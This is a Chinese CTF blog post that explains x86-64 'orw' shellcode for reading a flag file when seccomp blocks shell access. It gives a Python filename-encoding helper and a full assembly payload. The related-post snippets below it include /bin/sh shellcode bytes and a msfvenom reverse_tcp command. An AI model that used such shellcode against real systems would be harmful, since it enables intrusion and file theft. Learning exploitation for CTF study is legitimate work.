orw通用代码,最短shellcode

已于 2022-04-04 09:41:40 修改
阅读量1.7k 收藏 7
点赞数 3
分类专栏: linux_pwn 文章标签: linux c语言 服务器
于 2022-04-02 09:33:24 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/azraelxuemo/article/details/123901051
版权

文章目录

什么时候需要orw

在这里插入图片描述
有时候题目可以看到有prctl,seccomp就可以大概猜到这个题目不太能直接用system获取shell,对于ctf来说就要用orw(open read write)读取flag

通用payload

一般我们都希望payload比较短,这样方便安放,同时也希望他尽量没有\0,可以实现如下payload

文件名转化函数

可以直接把文件名转化为shellcode里面hex

def convert_str_asmencode(content: str):
    out = ""
    for i in content:
        out = hex(ord(i))[2:] + out
    out = "0x" + out
    return out

open

这里rsi rdx都为0,因为我们以只读打开flag,这两个对应的是权限
rdi就是指向我们的字符串

xor rsi,rsi;
xor rdx,rdx;
push rdx; #添加\x00,但不会引入\x00
mov rax,{convert_str_asmencode("././flag")}; #这里填写对应的文件名,这里因为要对应hex编码,所以我写了个函数,这里最好文件名凑到8的整数倍,不然会出现\x00
push rax;
mov rdi,rsp;
xor rax,rax;
mov al,2;
syscall;

read

mov rdi,rax;#rdi为文件描述符
mov dl,0x40;#长度
mov rsi,{stack_addr}#保存位置
mov al,0; 
syscall;

write

xor rdi,rdi;#因为题目里面标准输入和标准输出都重定向了,所以我们就用标准输入就好
mov al,1;
syscall;

allpayload

shellcode=f"""
xor rsi,rsi;
xor rdx,rdx;
push rdx;
mov rax,{convert_str_asmencode("././flag")};
push rax;
mov rdi,rsp;
xor rax,rax;
mov al,2;
syscall;
mov rdi,rax;
mov dl,0x40;
mov rsi,rsp
mov al,0;
syscall;
xor rdi,rdi;
mov al,1;
syscall;
"""
azraelxuemo
关注
  • 3
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
orw_shellcode_模板
huzai9527的博客
05-23 1545
orw 64位 shellcode shellcode = "\x6a\x3b\x58\x99\x52\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x54\x5f\x52\x57\x54\x5e\x0f\x05" #pwntools context.arch = elf.arch shellcode = asm(shellcreaft.sh()) orw #pwntools shellcode = '' shellcode += shellcraft.open
linux我知道的最shellcode
fjh1997的博客
04-16 1352
长度19 xor eax, eax push eax push 0x68732f2f push 0x6e69622f xchg ebx, esp mov al, 0xb int 0x80 来源:https://www.exploit-db.com/exploits/40131
一段小的 shellcode 测试 代码
kerson的专栏
11-30 1211
<br /><br />int main() <br />{ <br />char shellcode[]=<br />"/xFC/x68/x6A/x0A/x38/x1E/x68/x63/x89/xD1/x4F/x68/x32/x74/x91/x0C"<br />"/x8B/xF4/x8D/x7E/xF4/x33/xDB/xB7/x04/x2B/xE3/x66/xBB/x33/x32/x53"<br />"/x68/x75/x73/x65/x72/x54/x33/xD2/x64/x8B/x5A/x30/x8
GDOUCTF2023 Writeup
S4n_v1的博客
04-16 1447
钝角
打造200字节的最通用ShellCode
木休的斋堂
03-14 1826
本篇文章源自《黑客防线》2007年4月刊 作者:王炜/ww0830 ShellCode,在保持对各个版本通用性的基础上,当然是越越好,这不仅仅是黑客艺术对简单美的追求,更重要的是有时候能利用的空间只有这么少。这不,这次我就遇到了长度限制只有210字节的情况。网上看了一下,属于比较ShellCode有“382 bytes bind port shellcode for win2k all
ShellCode 最小化编译优化
weixin_30790841的博客
08-15 113
1.生成ShellCode [root@localhost ~]# msfvenom -a x86 --platform Windows \ > -p windows/meterpreter/reverse_tcp \ > -b '\x00\x0b' LHOST...
vagrant-neosdev:TYPO3 Neos 和 Flow 通用开发服务器
05-31
MOC TYPO3 Neos and Flow 通用开发服务器 用于在类似于 MOC 托管生产机器的环境中开发 TYPO3 Flow 和 Neos 站点的 Vagrant 配置。 该机器运行 Debian wheezy,并使用内置的 puppet 配置器进行配置。 需要 Vagrant ...
字与、字或、字异或plc逻辑运算指令.pdf
03-22
本文件主要介绍了三种字级别的逻辑运算指令:ANDW(字与)、ORW(字或)和XORW(字异或),这些都是在进行位逻辑操作时常用的指令。 1. ANDW(字与)指令: 这个指令执行的是按位与操作,即对两个输入字的每一位...
字与、字或、字异或plc逻辑运算指令.docx
03-22
本文将详细讲解三个主要的字逻辑运算指令:ANDW(字与)、ORW(字或)和XORW(字异或),以及它们在实际应用中的作用和影响。 首先,ANDW(字与)指令是基于二进制的“与”运算,它对两个输入字的每一位进行比较。...
欧姆龙omronPLC指令.docx
11-16
子程序和中断控制指令允许编写可重用的代码块,并处理中断事件,提高程序的模块化和效率。高速计数器和脉冲输出指令则用于实现精确的计数和控制输出。 串行通信指令如TXD和RXD处理与外部设备的数据传输。时钟和日历...
cpma的十进制运算指令实用PPT学习教案.pptx
10-06
3. **字逻辑或运算指令 ORW (35)**:执行逻辑或操作,如`ORW (35)`或`@ORW (35)`,只要有一个对应位是1,结果位就为1。 4. **字逻辑异或运算指令 XORW (36)**:执行逻辑异或操作,如`XORW (36)`或`@XORW (36)`,当...
shellcode提取方法和测试【原创】
12-13
这是一个windows弹出对话框的shellcode,38个字节 在windows xp sp3下测试 已在vc++6,mingw,cygwin下编译测试
手把手简易实现shellcode及详解
3-Number
06-22 6301
转载理由: 处于安全行业靠边产业,经常听和看到shellcode,但是只有模糊的认识,于是学习一把,毕竟C和汇编了解,开阔下视野; 转载于:http://blog.nsfocus.net/simple-realization-hand-handle-shellcode-detailed-explanation/?utm_source=tuicool&utm_medium=referral
一篇文章彻底清楚shellcode(精品)
weixin_51055545的博客
03-08 8956
shellcode 类题目 文章目录shellcode 类题目1.没开沙箱(此时我们可以系统调用get shell)picoctf_2018_shellcodemrctf2020_shellcode2.开启沙箱(orw读flag)gwctf_2019_shellcode 1.没开沙箱(此时我们可以系统调用get shell) (一)32位程序系统调用 32位程序有别于64位程序,32位通过栈传参,我们常用的寄存器有4个数据寄存器(eax,ebx,ecx,edx),2个变址寄存器(esi,edi),2个指针寄
PWN题[强网先锋]orw超详细讲解(多解法)
am_03的博客
09-01 4290
知识点 构造一段shellcode的作用就是为了在缓冲区溢出时将shellcode的地址覆盖正常的返回地址。 \x00 截断符 shellcode里出现\x00就会从其截断,所以构造shellcode的时候要避免\x00 x64函数调用规则 x64机器在调用某个函数前,比如int func(int a, int b, int c, int d, int e, int f, int g, int h),首先他会把前6个参数从左往右存入到寄存器rdi、rsi、rdx、rcx、r8、r9,其余参数存入到栈里,保存
[BUUCTF]PWN——[极客大挑战 2019]Not Bad (orw_shellcode
mcmuyanga的博客
01-30 2474
[极客大挑战 2019]Not Bad 附件 步骤
shellcode
snowleopard_bin的博客
08-10 1509
shuallcode shellcode='\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\xb0\x3b\x0f\x05' 64bit local /bin/sh 有时遇到写的字符中不能包含'\x0b'这个字符,因此不能...
简单shellcode学习
蚁景网安学院
07-10 1079
引言之前遇到没开启NX保护的时候,都是直接用pwtools库里的shellcode一把梭,也不太懂shellcode代码具体做了些什么,遇到了几道不能一把梭的题目,简单学习一下shell...
orw (pwnable_orw和[V&N2020 公开赛]warmup)和 picoctf_2018_rop chain 记录笔记
carol2358的博客
05-21 1360
学到一种新的做法,orw(open,read,write),可以用在system,fork syscall(不能打开子进程,需要在当前进程里读入flag并输出) 和execve被禁的情况下打印出flag,还有seccomp 虽然还不太懂,但先记录一下目前的理解 seccomp安全机制能使一个进程进入到一种“安全”运行模式,该模式下的进程只能调用4种系统调用(system call),即 read(), write(), exit() 和 sigreturn(),否则进程便会被终止。 著作权归作者所有。商业转
return orw();
最新发布
12-19
return orw()是一个函数调用表达式,它会调用名为orw()的函数,并将函数的返回值作为整个表达式的值返回。 在这个表达式中,orw()表示一个被定义的函数。函数调用的一般形式是函数名后跟一对括号,括号中可以包含一些参数。这里的orw()没有提供参数,表示函数调用时没有传递任何参数给这个函数。 在函数调用完成后,使用return关键字可以将函数的返回值作为整个表达式的值返回给调用者。这个返回值可以是任何类型的值,包括整数、浮点数、字符串等。 需要注意的是,这个表达式中没有给出具体的函数定义和实现,因此无法确定orw()函数的具体功能和返回值类型。如果想要理解orw()的具体含义,需要查看定义和实现该函数的代码

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值